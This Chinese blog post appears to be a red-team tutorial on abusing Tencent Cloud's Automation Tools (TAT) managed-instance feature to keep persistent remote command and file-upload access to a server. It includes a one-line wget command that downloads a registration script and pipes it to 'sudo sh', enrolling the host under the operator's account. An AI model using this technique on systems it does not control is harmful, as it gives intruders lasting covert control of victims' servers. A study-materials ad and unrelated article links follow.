腾讯云(CVM)托管进行权限维持

前言

刚好看到一个师傅分享了一个阿里云ECS实战攻防,然后想到了同样利用腾讯云CVM的托管亦可实现在实战攻防中的权限维持。

简介

腾讯云自动化助手(TencentCloud Automation Tools,TAT)是一个原生运维部署工具,它可以在不登录或输入密码的情况下,实现对云服务器 CVM 和轻量应用服务器 Lighthouse 的自动化远程操作。该工具支持批量执行命令,包括 Shell、PowerShell 及 Python 等,能够完成一系列自动化运维任务,如运行自动化脚本、轮询进程、安装/卸载软件、更新应用及安装补丁等。这样的便利性使得企业可以更加高效地管理和维护其云服务器和轻量应用服务器,从而提高其云计算服务的可靠性和安全性。

  • 应用场景

上传并运行自动化运维脚本

执行常见操作任务

运行已保存的脚本

托管实例

控制台->自动化助手->托管实例

权限维持

使用默认数值即可,默认值的阈值设定和阿里云的一致

实例创建成功后,可在客户端执行命令

  • Linux命令
cmd 复制代码
sudo wget -qO - https://xxxxxxxxx.cos.accelerate.myqcloud.com/tat_agent/tat_agent_register.sh | sudo sh -s -- ap-guangzhou b3ec8e08-d73a-40d8-83c4-7308101b00b6 be131e221d1749a6860a4e3a6e1b37415f1c867f2646436abb67e0998fa24883

执行命令后发现实例可托管成功,但是是离线状态

帮助网安学习,全套资料S信免费领取:

① 网安学习成长路径思维导图

② 60+网安经典常用工具包

③ 100+SRC分析报告

④ 150+网安攻防实战技术电子书

⑤ 最权威CISSP 认证考试指南+题库

⑥ 超1800页CTF实战技巧手册

⑦ 最新网安大厂面试题合集(含答案)

⑧ APP客户端安全检测指南(安卓+IOS)

查看探针状态

复制代码
ps -ef | grep tat_agent

命令后,查看进程状态。如果进程不存在

复制代码
/usr/local/qcloud/tat_agent/tat_agent   // 启动进程

其实这里的客户端的探针类似于监听状态,一直在线,托管服务器执行命令上线

  • 执行命令

执行结果

执行时长48

  • 文件上传

文件上传权限等均可自定义。

小结

可以明显发现执行时效性不是很流畅,但是优点儿在于:

  • 托管权限维持稳定
  • 文件上传方便以及文件权限方便
相关推荐
TG_yunshuguoji13 小时前
亚马逊云渠道商:AWS实例自动替换策略在哪里设置?
运维·服务器·云计算·aws
TG:@yunlaoda360 云老大15 小时前
阿里云国际站GPU:阿里云GPU怎么释放实例?
服务器·阿里云·云计算
TG:@yunlaoda360 云老大15 小时前
阿里云国际站GPU:怎么通过控制台自助排查功能诊断GPU?
服务器·阿里云·云计算
runepic15 小时前
阿里云 CentOS 磁盘扩容记录:resize2fs 版本过低导致无法扩容的解决方案
服务器·阿里云·centos·云计算·1024程序员节
TG:@yunlaoda360 云老大17 小时前
腾讯云国际站代理商:腾讯云负载均衡的健康探测源IP,我该如何诊断和配置?
服务器·云计算·腾讯云
TG:@yunlaoda360 云老大19 小时前
腾讯云国际站WAF:如何在腾讯云WAF上设置CC攻击防护,以保障业务数据免被恶意爬取?
服务器·云计算·腾讯云
KevinPedri20 小时前
测试:uk8s创建监控和告警同步飞书等渠道
docker·kubernetes·云计算·1024程序员节
搞科研的小刘选手20 小时前
【云计算专题会议】第二届云计算与大数据国际学术会议(ICCBD 2025)
大数据·人工智能·物联网·5g·云计算·6g·智能通信
wanhengidc1 天前
服务器硬件设备都有哪些?
运维·服务器·网络·游戏·智能手机·架构·云计算
TG_yunshuguoji1 天前
阿里云代理商:阿里云CDN访问问题怎么诊断?
运维·服务器·阿里云·云计算